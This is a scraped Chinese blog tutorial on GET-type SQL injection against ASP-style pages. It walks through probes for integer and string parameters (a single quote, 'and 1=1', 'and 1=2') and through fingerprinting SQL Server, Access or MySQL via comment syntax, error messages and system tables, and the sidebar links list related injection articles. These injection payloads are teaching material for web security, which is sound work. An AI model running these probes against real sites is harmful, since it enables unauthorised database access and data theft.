sql注入查mysql表名_GET型SQL注入(注入点和数据库类型的判断)

最新推荐文章于 2024-05-30 19:45:52 发布
最新推荐文章于 2024-05-30 19:45:52 发布
阅读量2.2k 收藏 2
点赞数 1
文章标签: sql注入查mysql表名
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_32418703/article/details/114000557
版权

网页一般为asp,php,jsp,aspx注入

对于GET型的SQL,语句一般为

select * from 表名 where 字段=YY

YY可为整数型,也可为字符型,因而在执行sql语句时是有很大区别的。

select * from 表名 where 字段=12

select * from 表名 where 字段='abc'

这使得在判断是否存在注入点时,构造的语句也有很大的区别。

注入点的判断:

先输入' 检测,如果'有过滤的话,输入and 1=1 ,and 1=2

1、整型参数的判断

当输入的参数YY为整型时,通常abc.asp中SQL语句原貌大致如下:

select * from 表名 where 字段=YY,所以可以用以下步骤测试SQL注入是否存在。

①HTTP://xxx.xxx.xxx/abc.asp?p=YY’(附加一个单引号),此时abc.ASP中的SQL语句变成了

select * from 表名 where 字段=YY’  abc.asp运行异常;(比如提示页面不存在)

②HTTP://xxx.xxx.xxx/abc.asp?p=YY and 1=1,

abc.asp运行正常,而且与HTTP://xxx.xxx.xxx/abc.asp?p=YY运行结果相同;

select * from 表名 where

字段=YY and 1=1  abc.asp运行正常

③HTTP://xxx.xxx.xxx/abc.asp?p=YY and 1=2, abc.asp运行异常;

select * from 表名 where

字段=YY and 1=1  abc.asp运行异常

如果以上三步全面满足,abc.asp中一定存在SQL注入漏洞。

2、字符串型参数的判断

当输入的参数YY为字符串时,通常abc.asp中SQL语句原貌大致如下:

select * from 表名 where 字段='YY',所以可以用以下步骤测试SQL注入是否存在。

①HTTP://xxx.xxx.xxx/abc.asp?p=YY’(附加一个单引号),此时abc.ASP中的SQL语句变成了

select * from 表名 where 字段=YY',abc.asp运行异常;

②HTTP://xxx.xxx.xxx/abc.asp?p=YY' and '1'='1,

abc.asp运行正常,而且与HTTP://xxx.xxx.xxx/abc.asp?p=YY运行结果相同;

select * from 表名 where

字段='YY' and '1'='1'  abc.asp运行正常;

③HTTP://xxx.xxx.xxx/abc.asp?p=YY&nb ...

39;1'='2', abc.asp运行异常;

select * from 表名 where

字段='YY' and '1'='2'  abc.asp运行异常;

如果以上三步全面满足,abc.asp中一定存在SQL注入漏洞。

数据库类型的判断:

1、可以根据输入非法字符时报的错来判断,有时报错时就暴露了数据库的类型

比如它希望GET的是一个整数型的,你输入一个字符的,那么可能会出错,有时直接输入'报错就暴露了数据库类型

2、有时利用--和#

这两个注释符号也可以大致的确认数据库类型,因为MSSQSL是--,而MYSQL是#,ACCESS不支持注释

HTTP://xxx.xxx.xxx/abc.asp?p=YY--  异常

HTTP://xxx.xxx.xxx/abc.asp?p=YY#  正常

那么数据库有可能就是MYSQL或者ACCESS

3、利用数据库服务器的系统变量进行区分

SQL-SERVER有user,db_name()等系统变量,利用这些系统值不仅可以判断SQL-SERVER,而且还可以得到大量有用信息。如:

HTTP://xxx.xxx.xxx/abc.asp?p=YY and user>0

出错时报的错可能就包含了MSSQL的信息

如:Microsoft OLE DB

Provider for SQL Server error '80040e07'

不仅可以判断是否是SQL-SERVER,而还可以得到当前连接到数据库的用户名

4、利用系统表

ACCESS的系统表是msysobjects,且在WEB环境下没有访问权限,而SQL-SERVER的系统表是sysobjects,在WEB环境下有访问权限。对于以下两条语句:

①HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select count(*) from

sysobjects)>0

②HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select count(*) from

msysobjects)>0

若数据库是SQL-SERVER,则第一条,abc.asp一定运行正常,第二条则异常;

若是ACCESS则两条都会异常。

simmmmmmmcha
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sql注入_表名、列名字典
05-06
union select * from 表名字典 union select 列名字典 from 表名
php is_numberic函数造成的SQL注入漏洞
01-21
一、is_numberic函数简介国内一部分CMS程序里面有用到过is_numberic函数,我们先看看这个函数的结构bool is_numeric (mixed $var)如果 var 是数字和数字字符串则返回 TRUE,否则返回 FALSE。二、函数是否安全接下来...
SQL注入学习之默认表名解读(二)
公众号:乌云安全
02-03 1283
0x00 information_schema 这个表(视图)是在MySQL5以后的才有的,现在MySQL4应该是很少了,所以都围绕着MySQL5来讲解,information_schema是用于存储数据库元数据的表,它保存了数据库名,表名,列名等信息,让我们从爆破表名到了可以直接询。 mysql> show tables; +---------------------------------------+ | Tables_in_information_schema | +---
sql注入之找库、找表、找字段
最新发布
m0_74608722的博客
05-30 139
sql注入的目标之一为找到想要注入的库、想要注入的表、想要注入的字段。SQL注入中含有字符逃逸。
SQL注入代码实践(盲注-获取数据库名长度【数字】)
DMHY123的博客
08-20 430
【代码】SQL注入代码实践(盲注-获取数据库名长度【数字】)
SQL注入讲课准备
weixin_62420492的博客
01-15 537
一.基本函数
数据库名、表名、列名
weixin_34128411的博客
04-27 70
select [name] from [sysdatabases] use 当前库名select [name] from [sysobjects] where [type] = 'u' --u 表示用户表select [name] from syscolumns where id= object_id('pcar') object_id :返回架构范围内对象的数据库对象标识号。 转载...
sqlselect.rar_java mysql_java mysql询_数据库
09-21
本文将深入探讨Java连接MySQL数据库并执行SQL询的相关知识。 首先,我们要了解的是Java中的JDBC(Java Database Connectivity),这是一个Java API,用于与各种数据库进行交互。使用JDBC,我们可以连接到MySQL...
MySQL 及 SQL 注入与防范方法
12-15
所谓SQL注入,就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的询字符串,最终达到欺骗服务器执行恶意的SQL命令。 我们永远不要信任用户的输入,我们必须认定用户输入的数据都是不安全的,我们都需要对...
Win2003服务器防SQL注入神器–D盾_IIS防火墙
01-10
 D盾_IIS防火墙,目前只支持Win2003服务器,前阵子看见官方博客说D盾新版将近期推出,相信功能会更强大,这边分享一下之前的SQL注入防御的测试情况。D盾_IIS防火墙注入防御策略,如下图,主要防御GET/POST/COOKIE,...
SQL注入-
soldi_er的博客
05-16 1734
文章目录概述系统数据库sys_4+3-ok系统数据库mysql系统数据库performance_schema参考 概述   Ciscn2021线上初赛的easy-sql中,过滤了information、sys、nno等关键字。 但是能够表名数据库、表是值得收集的。   MySQL5.7中,有四个默认数据库,分别是information_schema库、sys库、mysql库、performance_schema库。   (1)information_schema自带数据库:可以表名和列名。   
sql注入关键字大全
07-27
sql注入关键字大全,包括sqlserve , odbc,等
SQL注入
guishengyx的博客
02-17 3096
SQL注入的核心:将用户的输入拼接到sql语句中,并被当做代码执行 注入基本流程: 判断是否存在注入 判断字段数 判断显错位置 判断库名 判断表名 判断列名 寻找具体数据 SQL注入: union =>联合询:将两条SQL语句的结果一齐输出(满足条件:相同字段数) order by =>排序(得到原有询语句输出结果有几个字段) database() =...
从sql中获取表名
weixin_30407613的博客
06-12 1101
<dependency> <groupId>com.github.jsqlparser</groupId> <artifactId>jsqlparser</artifactId> <version>0.9</version> </dependenc...
【Burp suite】结合SQL注入暴力获取表名、列名等信息
weixin_43526443的博客
04-04 2944
一、前提了解 1.分析        以往的单纯SQL注入获取MySql数据库表名、列名等,均基于其information_schema库获取,若后台开发者使用非MySql数据库或屏蔽information_schema,则无法获取数据库表名、列表等信息。 2.解决      &...
SQL注入详解
热门推荐
qq_48904485的博客
03-21 2万+
针对SQL注入的攻击行为可描述为通过用户可控参数中注入SQL语法,破坏原有SQL结构,达到编写程序意料之外结果的攻击行为。 其成因可归结为以下两个原理叠加造成: 1、程序编写者在处理程序和数据库交互时,使用字符串凭借的方式构造SQL语句。 2、未对用户可控参数进行足够的过滤便将参数内容拼接进入到SQL语句中。 SQL注入的攻击方式分为:报错注入、布尔盲注 、延时注入、堆叠询、联合询 、二次注入等等
注入判断mysql数据库_注入判断数据库类型
weixin_42282699的博客
02-12 329
SQL注入-数据库判断国内的网站用ASP+Access或SQLServer的占70%以上,PHP+MySQL占20%,其他的不足10%。常见的数据库Oracle、MySQL、SQL Server、Access、MSsql、mongodb等关系数据库通过外键关联来建立表与表之间的关系,非关系数据库通常指数据以对象的形式存储在数据库中,而对象之间的关系通过每个对象自身的属性来决定.关系数据库:由...
[HACK学习呀] - 2019-11-11 科普基础 - 这可能是最全的SQL注入总结,不来看看吗1
08-03
1.MySQL5.0以下没有information_schema这个默认数据库 2.ACCESS没有库名,只有表和字段,并且注入时,后面必须跟表名 3.MySQ

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值